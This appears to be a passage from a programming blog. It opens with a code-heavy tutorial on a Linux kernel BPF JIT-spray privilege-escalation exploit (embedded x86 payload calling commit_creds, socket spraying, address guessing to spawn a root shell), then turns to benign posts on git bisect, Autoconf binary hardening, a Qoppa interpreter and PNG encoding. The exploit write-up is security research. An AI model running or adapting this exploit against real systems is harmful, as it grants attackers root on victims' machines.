Berkeley Packet Filters (BPF) allow a userspace program to specify which network traffic it wants to receive. Filters are virtual machine programs which run in kernel mode. This is done for efficiency; it avoids a system call round-trip for each rejected packet. Since version 3.0, Linux on AMD64 optionally implements the BPF virtual machine using a just-in-time compiler.

For our JIT spray attack, we will build a BPF program in memory.

size_t code_len = 0;
struct sock_filter code[1024];

void emit_bpf(uint16_t opcode, uint32_t operand) {
    code[code_len++] = (struct sock_filter) BPF_STMT(opcode, operand);
}

A BPF "load immediate" instruction will compile to mov $x, %eax. We embed our payload instructions inside these, exactly as we saw above.

// Embed a three-byte x86 instruction.
void emit3(uint8_t x, uint8_t y, uint8_t z) {
    union {
        uint8_t  buf[4];
        uint32_t imm;
    } operand = {
        .buf = { x, y, z, 0xa8 }
    };

    emit_bpf(BPF_LD+BPF_IMM, operand.imm);
}

// Pad shorter instructions with nops.
#define emit2(_x, _y) emit3((_x), (_y), 0x90)
#define emit1(_x)     emit3((_x), 0x90, 0x90)

Remember, the byte a8 eats the opcode b8 from the following legitimate mov instruction, turning into the harmless instruction test $0xb8, %al.

Calling a kernel function is a slight challenge because we can only use three-byte instructions. We load the function's address one byte at a time, and sign-extend from 32 bits.

void emit_call(uint32_t addr) {
    emit2(0xb4, (addr & 0xff000000) >> 24);  // mov  $x,  %ah
    emit2(0xb0, (addr & 0x00ff0000) >> 16);  // mov  $x,  %al
    emit3(0xc1, 0xe0, 0x10);                 // shl  $16, %eax
    emit2(0xb4, (addr & 0x0000ff00) >>  8);  // mov  $x,  %ah
    emit2(0xb0, (addr & 0x000000ff));        // mov  $x,  %al
    emit2(0x48, 0x98);                       // cltq
    emit2(0xff, 0xd0);                       // call *%rax
}

Then we can build a classic "get root" payload like so:

emit3(0x48, 0x31, 0xff);  // xor  %rdi, %rdi
emit_call(get_kernel_symbol("prepare_kernel_cred"));
emit3(0x48, 0x89, 0xc7);  // mov  %rax, %rdi
emit_call(get_kernel_symbol("commit_creds"));
emit1(0xc3);              // ret

This is just the C call

commit_creds(prepare_kernel_cred(0));

expressed in our strange dialect of machine code. It will give root privileges to the process the kernel is currently acting on behalf of, i.e., our exploit program.

Looking up function addresses is a well-studied part of kernel exploitation. My get_kernel_symbol just greps through /proc/kallsyms, which is a simplistic solution for demonstration purposes. In a real-world exploit you would search a number of sources, including hard-coded values for the precompiled kernels put out by major distributions.

Alternatively the JIT spray payload could just disable SMEP, then jump to a traditional payload in userspace memory. We don't need any kernel functions to disable SMEP; we just poke a CPU control register. Once we get to the traditional payload, we're running normal C code in kernel mode, and we have the flexibility to search memory for any functions or data we might need.

Filling memory with sockets

The "spray" part of JIT spraying involves creating many copies of the payload in memory, and then making an informed guess of the address of one of them. In Dion Blazakis's original paper, this is done using a separate information leak in the Flash plugin.

For this kernel exploit, it turns out that we don't need any information leak. The BPF JIT uses module_alloc to allocate memory in the 1.5 GB space reserved for kernel modules. And the compiled program is aligned to a page, i.e., a multiple of 4 kB. So we have fewer than 19 bits of address to guess. If we can get 8000 copies of our program into memory, we have a 1 in 50 chance on each guess, which is not too bad.

Each socket can only have one packet filter attached, so we need to create a bunch of sockets. This means we could run into the resource limit on the number of open files. But there's a fun way around this limitation. (I learned this trick from Nelson Elhage but I haven't seen it published before.)

UNIX domain sockets can transmit things other than raw bytes. In particular, they can transmit file descriptors¹. An FD sitting in a UNIX socket buffer might have already been closed by the sender. But it could be read back out in the future, so the kernel has to maintain all data structures relating to the FD — including BPF programs!

So we can make as many BPF-filtered sockets as we want, as long as we send them into other sockets and close them as we go. There are limits on the number of FDs enqueued on a socket, as well as the depth² of sockets sent through sockets sent through etc. But we can easily hit our goal of 8000 filter programs using a tree structure.

#define SOCKET_FANOUT 20
#define SOCKET_DEPTH   3

// Create a socket with our BPF program attached.
int create_filtered_socket() {
    int fd = socket(AF_INET, SOCK_DGRAM, 0);
    setsockopt(fd, SOL_SOCKET, SO_ATTACH_FILTER, &filt, sizeof(filt));
    return fd;
}

// Send an fd through a UNIX socket.
void send_fd(int dest, int fd_to_send);

// Create a whole bunch of filtered sockets.
void create_socket_tree(int parent, size_t depth) {
    int fds[2];
    size_t i;
    for (i=0; i<SOCKET_FANOUT; i++) {
        if (depth == (SOCKET_DEPTH - 1)) {
            // Leaf of the tree.
            // Create a filtered socket and send it to 'parent'.
            fds[0] = create_filtered_socket();
            send_fd(parent, fds[0]);
            close(fds[0]);
        } else {
            // Interior node of the tree.
            // Send a subtree into a UNIX socket pair.
            socketpair(AF_UNIX, SOCK_DGRAM, 0, fds);
            create_socket_tree(fds[0], depth+1);

            // Send the pair to 'parent' and close it.
            send_fd(parent, fds[0]);
            send_fd(parent, fds[1]);
            close(fds[0]);
            close(fds[1]);
        }
    }
}

The interface for sending FDs through a UNIX socket is really, really ugly, so I didn't show that code here. You can check out the implementation of send_fd if you want to.

The exploit

Since this whole article is about a strategy for exploiting kernel bugs, we need some kernel bug to exploit. For demonstration purposes I'll load an obviously insecure kernel module which will jump to any address we write to /proc/jump.

We know that a JIT-produced code page is somewhere in the region used for kernel modules. We want to land 3 bytes into this page, skipping an xor %eax, %eax (31 c0) and the initial b8 opcode.

#define MODULE_START 0xffffffffa0000000UL
#define MODULE_END   0xfffffffffff00000UL
#define MODULE_PAGES ((MODULE_END - MODULE_START) / 0x1000)

#define PAYLOAD_OFFSET 3

A bad guess will likely oops the kernel and kill the current process. So we fork off child processes to do the guessing, and keep doing this as long as they're dying with SIGKILL.

int status, jump_fd, urandom;
unsigned int pgnum;
uint64_t payload_addr;

// ...

jump_fd = open("/proc/jump",   O_WRONLY);
urandom = open("/dev/urandom", O_RDONLY);

do {
    if (!fork()) {
        // Child process
        read(urandom, &pgnum, sizeof(pgnum));
        pgnum %= MODULE_PAGES;
        payload_addr = MODULE_START + (0x1000 * pgnum) + PAYLOAD_OFFSET;

        write(jump_fd, &payload_addr, sizeof(payload_addr));
        execl("/bin/sh", "sh", NULL);  // Root shell!
    } else {
        wait(&status);
    }
} while (WIFSIGNALED(status) && (WTERMSIG(status) == SIGKILL));

The forked children get a copy the whole process's state, of course, but they don't actually need it. The BPF programs live in kernel memory, which is shared by all processes. So the program that sets up the payload could be totally unrelated to the one that guesses addresses.

Notes

The full source is available on GitHub. It includes some error handling and cleanup code that I elided above.

I'll admit that this is mostly a curiosity, for two reasons:

SMEP is not widely deployed yet.
The BPF JIT is disabled by default, and distributions don't enable it.

Unless Intel abandons SMEP in subsequent processors, it will be widespread within a few years. It's less clear that the BPF JIT will ever catch on as a default configuration. But I'll note in passing that Linux is now using BPF programs for process sandboxing as well.

The BPF JIT is enabled by writing 1 to /proc/sys/net/core/bpf_jit_enable. You can write 2 to enable a debug mode, which will print the compiled program and its address to the kernel log. This makes life unreasonably easy for my exploit, by removing the address guesswork.

I don't have a CPU with SMEP, but I did try a grsecurity / PaX hardened kernel. PaX's KERNEXEC feature implements³ in software a policy very similar to SMEP. And indeed, the JIT spray exploit succeeds where a traditional jump-to-userspace fails. (grsecurity has other features that would mitigate this attack, like the ability to lock out users who oops the kernel.)

The ARM, SPARC, and 64-bit PowerPC architectures each have their own BPF JIT. But I don't think they can be used for JIT spraying, because these architectures have fixed-size, aligned instructions. Perhaps on an ARM kernel built for Thumb-2...

Actually, file descriptions. The description is the kernel state pertaining to an open file. The descriptor is a small integer referring to a file description. When we send an FD into a UNIX socket, the descriptor number received on the other end might be different, but it will refer to the same description.↩
While testing this code, I got the error ETOOMANYREFS. This was easy to track down, as there's only one place in the entire kernel where it is used.↩
On i386, KERNEXEC uses x86 segmentation, with negligible performance impact. Unfortunately, AMD64's vestigial segmentation is not good enough, so there KERNEXEC relies on a GCC plugin to instrument every computed control flow instruction in the kernel. Specifically, it ors the target address with (1 << 63). If the target was a userspace address, the new address will be non-canonical and the processor will fault.↩

Tracking down unused variables with Pyflakes and git bisect

2012-09-18T07:45:00.000-07:00

I was working on a Python project when I noticed a variable that was defined but never used. Does this indicate that some important code was accidentally deleted? Or was there just a minor oversight during refactoring?

To answer this question, I wanted to see the Git commit which removed the last use of this variable. This sounds like a job for git bisect. And because Pyflakes can detect unused variables, the whole process is completely automatic.

I made a guess that the mystery_variable became unused sometime within the past two weeks. Then I told Git to consider a commit "good" if Pyflakes's list of complaints does not mention mystery_variable.

$ git bisect start master master@{'2 weeks ago'}
Already on 'master'
Bisecting: 150 revisions left to test after this (roughly 7 steps)
[066327622129dbe863f6e2fc4746ff9e869bd049] Synthesize gravity

$ git bisect run bash -c '! pyflakes foo.py | grep mystery_variable'
running bash -c ! pyflakes foo.py | grep mystery_variable
Bisecting: 75 revisions left to test after this (roughly 6 steps)
[d3a5665eff478cccfb86d994a8fc289446325fbf] Model object components
running bash -c ! pyflakes foo.py | grep mystery_variable
Bisecting: 37 revisions left to test after this (roughly 5 steps)
[6ddcfbf27a1a4548acf972a6b817e485743f6bd9] Time-compress simulator clock
...

running bash -c ! pyflakes foo.py | grep mystery_variable
9c2b2f006207ae9f274f9182efeb3e009d18ed04 is the first bad commit
commit 9c2b2f006207ae9f274f9182efeb3e009d18ed04
Author: Ben Bitdiddle <bitdiddle@example.com>
Date:   Fri Sep 14 01:38:31 2012 -0400

    Reticulate splines

Now I can examine this commit and see what happened.

taralli: Screen edge pointer wrapping for X

2012-09-09T18:51:00.000-07:00

The maximum travel distance between points on a desktop is substantially reduced if the pointer is allowed to travel off a screen edge and reappear at the opposite edge. In other words, we change the topology of the desktop to be that of a torus. This is not a new idea: it's implemented in several window managers, programs for Windows and Mac OS X, and is even the subject of a research paper.

I wanted a standalone program to implement mouse pointer wrapping for X Windows on GNU/Linux. Previously I was using Synergy for this task. Synergy is a very cool program, but it's not a good choice for pointer wrapping on a single machine.

Correctness: I have several monitors at different resolutions, which means my desktop isn't rectangular. Synergy didn't understand where the edge of each monitor is.
Security: I don't need the exposure of 95,000 lines of code for this simple task. Even if there are no bugs in Synergy, I'm one configuration mistake away from running an unencrypted network keylogger.
Energy efficiency: Synergy wakes up 40 times per second even when nothing is happening. This can have a significant impact on laptop battery life.

So I wrote taralli as a simple replacement. It doesn't automatically understand non-rectangular desktops, but you can easily customize the pointer position mapping, to implement multi-monitor wrap-around or many other behaviors. (If someone would like to contribute the code to get multi-monitor information from Xinerama or something, I would be happy to add that.)

taralli is under 100 lines of C99. It has been tested on GNU/Linux and is likely portable to other X platforms. You can download it from GitHub, which is also a great place to submit any bug reports or patches.

Automatic binary hardening with Autoconf

2012-05-13T09:59:00.000-07:00

How do you protect a C program against memory corruption exploits? We should try to write code with no bugs, but we also need protection against any bugs which may lurk. Put another way, I try not to crash my bike but I still wear a helmet.

Operating systems now support a variety of tricks to make life difficult for would-be attackers. But most of these hardening features need to be enabled at compile time. When I started contributing to Mosh, I made it a goal to build with full hardening on every platform, not just proactive distributions like Ubuntu. This means detecting available hardening features at compile time.

Mosh uses Autotools, so this code is naturally part of the Autoconf script. I know that Autotools has a bad reputation in some circles, and I'm not going to defend it here. But a huge number of existing projects use Autotools. They can benefit today from a drop-in hardening recipe.

I've published an example project which uses Autotools to detect and enable some binary hardening features. To the extent possible under law, I waive all copyright and related or neighboring rights to the code I wrote for this project. (There are some third-party files in the m4/ subdirectory; those are governed by the respective licenses which appear in each file.) I want this code to be widely useful, and I welcome any refinements you have.

This article explains how my auto-detection code works, with some detail about the hardening measures themselves. If you just want to add hardening to your project, you don't necessarily need to read the whole thing. At the end I talk a bit about the performance implications.

How it works

The basic idea is simple. We use AX_CHECK_{COMPILE,LINK}_FLAG from the Autoconf Archive to detect support for each feature. The syntax is

AX_CHECK_COMPILE_FLAG(flag, action-if-supported, action-if-unsupported, extra-flags)

For extra-flags we generally pass -Werror so the compiler will fail on unrecognized flags. Since the project contains both C and C++ code, we check each flag once for the C compiler and once for the C++ compiler. Also, some flags depend on others, or have multiple alternative forms. This is reflected in the nesting structure of the action-if-supported and action-if-unsupported blocks. You can see the full story in configure.ac.

We accumulate all the supported flags into HARDEN_{C,LD}FLAGS and substitute these into each Makefile.am. The hardening flags take effect even if the user overrides CFLAGS on the command line. To explicitly disable hardening, pass

./configure --disable-hardening

A useful command when testing is

grep HARDEN config.log

Complications

Clang will not error out on unrecognized flags, even with -Werror. Instead it prints a message like

clang: warning: argument unused during compilation: '-foo'

and continues on blithely. I don't want these warnings to appear during the actual build, so I hacked around Clang's behavior. The script wrap-compiler-for-flag-check runs a command and errors out if the command prints a line containing "warning: argument unused". Then configure temporarily sets

CC="$srcdir/scripts/wrap-compiler-for-flag-check $CC"

while performing the flag checks.

When I integrated hardening into Mosh, I discovered that Ubuntu's default hardening flags conflict with ours. For example we set -Wstack-protector, meaning "warn about any unprotected functions", and they set --param=ssp-buffer-size=4, meaning "don't protect functions with fewer than 4 bytes of buffers". Our stack-protector flags are strictly more aggressive, so I disabled Ubuntu's by adding these lines to debian/rules:

export DEB_BUILD_MAINT_OPTIONS = hardening=-stackprotector
-include /usr/share/dpkg/buildflags.mk

We did something similar for Fedora.

Yet another problem is that Debian distributes skalibs (a Mosh dependency) as a static-only library, built without -fPIC, which in turn prevents Mosh from using -fPIC. Mosh can build the relevant parts of skalibs internally, but Debian and Ubuntu don't want us doing that. The unfortunate solution is simply to reimplement the small amount of skalibs we were using on Linux.

The flags

Here are the specific protections I enabled.

-D_FORTIFY_SOURCE=2 enables some compile-time and run-time checks on memory and string manipulation. This requires -O1 or higher. See also man 7 feature_test_macros.
-fno-strict-overflow prevents GCC from optimizing away arithmetic overflow tests.
-fstack-protector-all detects stack buffer overflows after they occur, using a stack canary. We also set -Wstack-protector (warn about unprotected functions) and --param ssp-buffer-size=1 (protect regardless of buffer size). (Actually, the "-all" part of -fstack-protector-all might imply ssp-buffer-size=1.)
Attackers can use fragments of legitimate code already in memory to stitch together exploits. This is much harder if they don't know where any of that code is located. Shared libraries get random addresses by default, but your program doesn't. Even an exploit against a shared library can take advantage of that. So we build a position independent executable (PIE), with the goal that every executable page has a randomized address.
Exploits can't overwrite read-only memory. Some areas could be marked as read-only except that the dynamic loader needs to perform relocations there. The GNU linker flag -z relro arranges to set them as read-only once the dynamic loader is done with them.

In particular, this can protect the PLT and GOT, which are classic targets for memory corruption. But PLT entries normally get resolved on demand, which means they're writable as the program runs. We set -z now to resolve PLT entries at startup so they get RELRO protection.

In the example project I also enabled -Wall -Wextra -Werror. These aren't hardening flags and we don't need to detect support, but they're quite important for catching security problems. If you can't make your project -Wall-clean, you can at least add security-relevant checks such as -Wformat-security.

Demonstration

On x86 Linux, we can check the hardening features using Tobias Klein's checksec.sh. First, as a control, let's build with no hardening.

$ ./build.sh --disable-hardening
+ autoreconf -fi
+ ./configure --disable-hardening
...
+ make
...
$ ~/checksec.sh --file src/test
No RELRO       No canary found  NX enabled  No PIE

The no-execute bit (NX) is mainly a kernel and CPU feature. It does not require much compiler support, and is enabled by default these days. Now we'll try full hardening:

$ ./build.sh
+ autoreconf -fi
+ ./configure
...
checking whether C compiler accepts -fno-strict-overflow... yes
checking whether C++ compiler accepts -fno-strict-overflow... yes
checking whether C compiler accepts -D_FORTIFY_SOURCE=2... yes
checking whether C++ compiler accepts -D_FORTIFY_SOURCE=2... yes
checking whether C compiler accepts -fstack-protector-all... yes
checking whether C++ compiler accepts -fstack-protector-all... yes
checking whether the linker accepts -fstack-protector-all... yes
checking whether C compiler accepts -Wstack-protector... yes
checking whether C++ compiler accepts -Wstack-protector... yes
checking whether C compiler accepts --param ssp-buffer-size=1... yes
checking whether C++ compiler accepts --param ssp-buffer-size=1... yes
checking whether C compiler accepts -fPIE... yes
checking whether C++ compiler accepts -fPIE... yes
checking whether the linker accepts -fPIE -pie... yes
checking whether the linker accepts -Wl,-z,relro... yes
checking whether the linker accepts -Wl,-z,now... yes
...
+ make
...
$ ~/checksec.sh --file src/test
Full RELRO     Canary found     NX enabled  PIE enabled

We can dig deeper on some of these. objdump -d shows that the unhardened executable puts main at a fixed address, say 0x4006e0, while the position-independent executable specifies a small offset like 0x9e0. We can also see the stack-canary checks:

b80:  sub   $0x18,%rsp
b84:  mov   %fs:0x28,%rax
b8d:  mov   %rax,0x8(%rsp)

      ... function body ...

b94:  mov   0x8(%rsp),%rax
b99:  xor   %fs:0x28,%rax
ba2:  jne   bb4 <c_fun+0x34>

      ... normal epilogue ...

bb4:  callq 9c0 <__stack_chk_fail@plt>

The function starts by copying a "canary" value from %fs:0x28 to the stack. On return, that value had better still be there; otherwise, an attacker has clobbered our stack frame.

The canary is chosen randomly by glibc at program start. The %fs segment has a random offset in linear memory, which makes it hard for an attacker to discover the canary through an information leak. This also puts it within thread-local storage, so glibc could use a different canary value for each thread (but I'm not sure if it does).

The hardening flags adapt to any other compiler options we specify. For example, let's try a static build:

$ ./build.sh LDFLAGS=-static
+ autoreconf -fi
+ ./configure LDFLAGS=-static
...
checking whether C compiler accepts -fPIE... yes
checking whether C++ compiler accepts -fPIE... yes
checking whether the linker accepts -fPIE -pie... no
...
+ make
...
$ file src/test
src/test: ELF 64-bit LSB executable, x86-64, version 1 (GNU/Linux),
statically linked, for GNU/Linux 2.6.26, not stripped
$ ~/checksec.sh --file src/test
Partial RELRO  Canary found     NX enabled  No PIE

We can't have position independence with static linking. And checksec.sh thinks we aren't RELRO-protecting the PLT — but that's because we don't have one.

Performance

So what's the catch? These protections can slow down your program significantly. I ran a few benchmarks for Mosh, on three test machines:

A wimpy netbook: 1.6 GHz Atom N270, Ubuntu 12.04 i386
A reasonable laptop: 2.1 GHz Core 2 Duo T8100, Debian sid amd64
A beefy desktop: 3.0 GHz Phenom II X6 1075T, Debian sid amd64

In all three cases I built Mosh using GCC 4.6.3. Here's the relative slowdown, in percent.

Protections	Netbook	Laptop	Desktop
Everything	16.0	4.4	2.1
All except PIE	4.7	3.3	2.2
All except stack protector	11.0	1.0	1.1

PIE really hurts on i386 because data references use an extra register, and registers are scarce to begin with. It's much cheaper on amd64 thanks to PC-relative addressing.

There are other variables, of course. One Debian stable system with GCC 4.4 saw a 30% slowdown, with most of it coming from the stack protector. So this deserves further scrutiny, if your project is performance-critical. Mosh doesn't use very much CPU anyway, so I decided security is the dominant priority.

Scheme without special forms: a metacircular adventure

2012-04-28T00:09:00.000-07:00

A good programming language will have many libraries building on a small set of core features. Writing and distributing libraries is much easier than dealing with changes to a language implementation. Of course, the choice of core features affects the scope of things we can build as libraries. We want a very small core that still allows us to build anything.

The lambda calculus can implement any computable function, and encode arbitrary data types. Technically, it's all we need to instruct a computer. But programs also need to be written and understood by humans. We fleshy meatbags will soon get lost in a sea of unadorned lambdas. Our languages need to have more structure.

As an example, the Scheme programming language is explicitly based on the lambda calculus. But it adds syntactic special forms for definitions, variable binding, conditionals, etc. Scheme also lets the programmer define new syntactic forms as macros translating to existing syntax. Indeed, lambda and the macro system are enough to implement some of the standard special forms.

But we can do better. There's a simple abstraction which lets us define lambda, Lisp or Scheme macros, and all the other special forms as mere library code. This idea was known as "fexprs" in old Lisps, and more recently as "operatives" in John Shutt's programming language Kernel. Shutt's PhD thesis [PDF] has been a vital resource for learning about this stuff; I'm slowly making my way through its 416 pages.

What I understand so far can be summarized by something self-contained and kind of cool. Here's the agenda:

I'll describe a tiny programming language named Qoppa. Its S-expression syntax and basic data types are borrowed from Scheme. Qoppa has no special forms, and a small set of built-in operatives.
We'll write a Qoppa interpreter in Scheme.
We'll write a library for Qoppa which implements enough Scheme features to run the Qoppa interpreter.
We'll use this nested interpreter to very slowly compute the factorial of 5.

All of the code is on GitHub, if you'd like to see it in one place.

Operatives in Qoppa

An operative is a first-class value: it can be passed to and from functions, stored in data structures, and so forth. To use an operative, you apply it to some arguments, much like a function. The difference is that

The operative receives its arguments as unevaluated syntax trees, and
The operative also gets an argument representing the variable-binding environment at the call site.

Just as Scheme's functions are constructed by the lambda syntax, Qoppa's operatives are constructed by vau. Here's a simple example:

(define quote
    (vau (x) env
        x))

We bind a single argument as x, and bind the caller's environment as env. (Since we don't use env, we could replace it with _, which means to ignore the argument in that position, like Haskell's _ or Kernel's #ignore.) The body of the vau says to return the argument x, unevaluated.

So this implements Scheme's quote special form. If we evaluate the expression (quote x) we'll get the symbol x. As it happens, quote is used sparingly in Qoppa. There is usually a cleaner alternative, as we'll see.

Here's another operative:

(define list (vau xs env
    (if (null? xs)
        (quote ())
        (cons
            (eval env (car xs))
            (eval env (cons list (cdr xs)))))))

This list operative does the same thing as Scheme's list function: it evaluates any number of arguments and returns them in a list. So (list (+ 2 2) 3) evaluates to the list (4 3).

In Scheme, list is just (lambda xs xs). In Qoppa it's more involved, because we must explicitly evaluate each argument. This is the hallmark of (meta)programming with operatives: we selectively evaluate using eval, rather than selectively suppressing evaluation using quote.

The last part of this code deserves closer scrutiny:

(eval env (cons list (cdr xs)))

What if the caller's environment env contains a local binding for the name list? Not to worry, because we aren't quoting the name list. We're building a cons pair whose car is the value of list... an operative! Supposing xs is (1 2 3), the expression

(cons list (cdr xs))

evaluates to the list

(<some-value-representing-an-operative> 2 3)

and that's what eval sees. Just like lambda, evaluating a vau expression captures the current environment. When the resulting operative is used, the vau body gets values from this captured static environment, not the dynamic argument of the caller. So we have lexical scoping by default, with the option of dynamic scoping thanks to that env parameter.

Compare this situation with Lisp or Scheme macros. Lisp macros build code which refers to external stuff by name. Maintaining macro hygiene requires constant attention by the programmer. Scheme's macros are hygienic by default, but the macro system is far more complex. Rather than writing ordinary functions, we have to use one of several special-purpose sublanguages. Operatives provide the safety of Scheme macros, but (like Lisp macros) they use only the core computational features of the language.

Implementing Qoppa

Now that you have a taste of what the language is like, let's write a Qoppa interpreter in Scheme.

We will represent an environment as a list of frames, where a frame is simply an association list. Within the vau body in

( (vau (x) _ x) 3 )

the current environment would be something like

( ;; local frame
  ((x 3))

  ;; global frame
  ((cons <operative>)
   (car  <operative>)
   ...) )

Here's a Scheme function to build a frame from some names and the corresponding values.

(define (bind param val) (cond
    ((and (null? param) (null? val))
        '())
    ((eq? param '_)
        '())
    ((symbol? param)
        (list (list param val)))
    ((and (pair? param) (pair? val))
        (append
            (bind (car param) (car val))
            (bind (cdr param) (cdr val))))
    (else
        (error "can't bind" param val))))

We allow names and values to be arbitrary trees, so for example

(bind
    '((a b) . c)
    '((1 2) 3 4))

evaluates to

((a 1)
 (b 2)
 (c (3 4)))

(If you'll recall, (x . y) is the pair formed by (cons 'x 'y), an improper list.) The generality of bind means our argument-binding syntax — in vau, lambda, let, etc. — will be richer than Scheme's.

Next, a function to find a (name value) entry, given the name and an environment. This just invokes assq on each frame until we find a match.

(define (m-lookup name env)
    (if (null? env)
        (error "could not find" name)
        (let ((binding (assq name (car env))))
            (if binding
                binding
                (m-lookup name (cdr env))))))

We also need a representation for operatives. A simple choice is that a Qoppa operative is represented by a Scheme procedure that takes the operands and current environment as arguments. Now we can write the Qoppa evaluator itself.

(define (m-eval env exp) (cond
    ((symbol? exp)
        (cadr (m-lookup exp env)))
    ((pair? exp)
        (m-operate env (m-eval env (car exp)) (cdr exp)))
    (else
        exp)))

(define (m-operate env operative operands)
    (operative env operands))

The evaluator has only three cases. If exp is a symbol, it refers to a value in the current environment. If it's a cons pair, the car must evaluate to an operative and the cdr holds operands. Anything else evaluates to itself: numbers, strings, Booleans, and Qoppa operatives (represented by Scheme procedures).

Instead of the traditional eval and apply we have "eval" and "operate". Thanks to our uniform representation of operatives, the latter is very simple.

Qoppa builtins

Now we need to populate the global environment with useful built-in operatives. vau is the most significant of these. Here is its corresponding Scheme procedure.

(define (m-vau static-env vau-operands)
    (let ((params    (car   vau-operands))
          (env-param (cadr  vau-operands))
          (body      (caddr vau-operands)))

        (lambda (dynamic-env operands)
            (m-eval
                (cons
                    (bind
                        (cons env-param   params)
                        (cons dynamic-env operands))
                    static-env)
                body))))

When applying vau, you provide a parameter tree, a name for the caller's environment, and a body. The result of applying vau is an operative which, when applied, evaluates that body. It does so in the environment captured by vau, extended with arguments.

Here's the global environment:

(define (make-global-frame)
    (define (wrap-primitive fun)
        (lambda (env operands)
            (apply fun (map (lambda (exp) (m-eval env exp)) operands))))
    (list
        (list 'vau m-vau)
        (list 'eval    (wrap-primitive m-eval))
        (list 'operate (wrap-primitive m-operate))
        (list 'lookup  (wrap-primitive m-lookup))
        (list 'bool    (wrap-primitive (lambda (b t f) (if b t f))))
        (list 'eq?     (wrap-primitive eq?))
        ; more like these
        ))

(define global-env (list (make-global-frame)))

Other than vau, each built-in operative evaluates all of its arguments. That's what wrap-primitive accomplishes. We can think of these as functions, whereas vau is something more exotic.

We expose the interpreter's m-eval and m-operate, which are essential for building new features as library code. We could implement lookup as library code; providing it here just prevents some code duplication.

The other functions inherited from Scheme are:

Type predicates: null? symbol? pair?
Pairs: cons car cdr set-car! set-cdr!
Arithmetic: + * - / <= =
I/O: error display open-input-file read eof-object

Scheme as a Qoppa library

The Qoppa interpreter uses Scheme syntax like lambda, define, let, if, etc. Qoppa itself supports none of this; all we get is vau and some basic data types. But this is enough to build a Qoppa library which provides all the Scheme features we used in the interpreter. This code starts out very cryptic, and becomes easier to read as we have more high-level features available. You can read through the full library if you like. This section will go over some of the more interesting parts.

Our first task is a bit of a puzzle: how do you define define? It's only possible because we expose the interpreter's representation of environments. We can push a new binding onto the top frame of env, like so:

(set-car! env
    (cons
        (cons <name> (cons <value> null))
        (car env)))

We use this idea twice, once inside the vau body for define, and once to define define itself.

((vau (name-of-define null) env
    (set-car! env (cons
        (cons name-of-define
            (cons (vau (name exp) defn-env
                    (set-car! defn-env (cons
                        (cons name (cons (eval defn-env exp) null))
                        (car defn-env))))
                null))
        (car env))))
    define ())

Next we'll define Scheme's if, which evaluates one branch or the other. We do this in terms of the Qoppa builtin bool, which always evaluates both branches.

(define if (vau (b t f) env
    (eval env
        (bool (eval env b) t f))))

We already saw the code for list, which evaluates each of its arguments. Many other operatives have this behavior, so we should abstract out the idea of "evaluate all arguments". The operative wrap takes an operative and returns a transformed version of that operative, which evaluates all of its arguments.

(define wrap (vau (operative) oper-env
    (vau args args-env
        (operate args-env
            (eval    oper-env operative)
            (operate args-env list args)))))

Now we can implement lambda as an operative that builds a vau term, evals it, and then wraps the resulting operative.

(define lambda (vau (params body) static-env
    (wrap
        (eval static-env
            (list vau params '_ body)))))

This works just like Scheme's lambda:

(define fact (lambda (n)
    (if (<= n 1)
        1
        (* n (fact (- n 1))))))

Actually, it's incomplete, because Scheme's lambda allows an arbitrary number of expressions in the body. In other words Scheme's

(lambda (x) a b c)

is syntactic sugar for

(lambda (x) (begin a b c))

begin evaluates its arguments in order left to right, and returns the value of the last one. In Scheme it's a special form, because normal argument evaluation happens in an undefined order. By contrast, the Qoppa interpreter implements a left-to-right order, so we'll define begin as a function.

(define last (lambda (xs)
    (if (null? (cdr xs))
        (car xs)
        (last (cdr xs)))))

(define begin (lambda xs (last xs)))

Now we can mutate the binding for lambda to support multiple expressions.

(define set! (vau (name exp) env
    (set-cdr!
        (lookup name env)
        (list (eval env exp)))))

(set! lambda
    ((lambda (base-lambda)
        (vau (param . body) env
            (eval env (list base-lambda param (cons begin body)))))
    lambda))

Note the structure

((lambda (base-lambda) ...) lambda)

which holds on to the original lambda operative, in a private frame. That's right, we're using lambda to save lambda so we can overwrite lambda. We use the same approach when defining other sugar, such as the implicit lambda in define.

There are some more bits of Scheme we need to implement: cond, let, map, append, and so forth. These are mostly straightforward; read the code if you want the full story. By far the most troublesome was Scheme's apply function, which takes a function and a list of arguments, and is supposed to apply the function to those arguments. The problem is that our functions are really operatives, and expect to call eval on each of their arguments. If we already have the values in a list, how do we pass them on?

Qoppa and Kernel have very different solutions to this problem. In Kernel, "applicatives" (things that evaluate all their arguments) are a distinct type from operatives. wrap is the primitive constructor of applicatives, and its inverse unwrap is used to implement apply. This design choice simplifies apply but complicates the core evaluator, which needs to distinguish applicatives from operatives.

For Qoppa I implemented wrap as a library function, which we saw before. But then we don't have unwrap. So apply takes the uglier approach of quoting each argument to prevent double-evaluation.

(define apply (wrap (vau (operative args) env
    (eval env (cons
        operative
        (map (lambda (x) (list quote x)) args))))))

In either Kernel or Qoppa, you're not allowed to apply apply to something that doesn't evaluate all of its arguments.

Testing

The code we saw above is split into two files:

qoppa.scm is the Qoppa interpreter, written in Scheme
prelude.qop is the Qoppa code which defines wrap, lambda, etc.

I defined a procedure execute-file which reads a file from disk and runs each expression through m-eval. The last line of qoppa.scm is

(execute-file "prelude.qop")

so the definitions in prelude.qop are available immediately.

We start by loading qoppa.scm into a Scheme interpreter. I'm using Guile here, but I've actually tested this with a variety of R5RS implementations.

$ guile -l qoppa.scm
guile> (m-eval global-env '(fact 5))
$1 = 120

This establishes that we've implemented the features used by fact, such as define and lambda. But did we actually implement enough to run the Qoppa interpreter? To test this, we need to go deeper.

guile> (execute-file "qoppa.scm")
$2 = done
guile> (m-eval global-env '(m-eval global-env '(fact 5)))
$3 = 120

This is factorial implemented in Scheme, implemented as a library for Qoppa, implemented in Scheme, implemented as a library for Qoppa, implemented in Scheme (implemented in C). Of course it's outrageously slow; on my machine this (fact 5) takes about 5 minutes. But it demonstrates that a tiny language of operatives, augmented with an appropriate library, can provide enough syntactic features to run a non-trivial Scheme program. As for how to do this efficiently, well, I haven't got far enough into the literature to have any idea.

A minimal encoder for uncompressed PNGs

2012-04-05T01:24:00.000-07:00

I've often wondered how hard it is to output a PNG file directly, without using a library or a standard tool like pnmtopng. (I'm not sure when you'd actually want to do this; maybe for a tiny embedded system with a web interface.)

I found that constructing a simple, uncompressed PNG does not require a whole lot of code, but there are some odd details I got wrong on the first try. Here's a crash course in writing a minimal PNG encoder. We'll use only a small subset of the PNG specification, but I'll link to the full spec so you can read more.

The example code is not too fast; it's written in Python and has tons of string copying everywhere. My goal was to express the idea clearly, and let you worry about coding it up in C for your embedded system or whatever. If you're careful, you can avoid ever copying the image data.

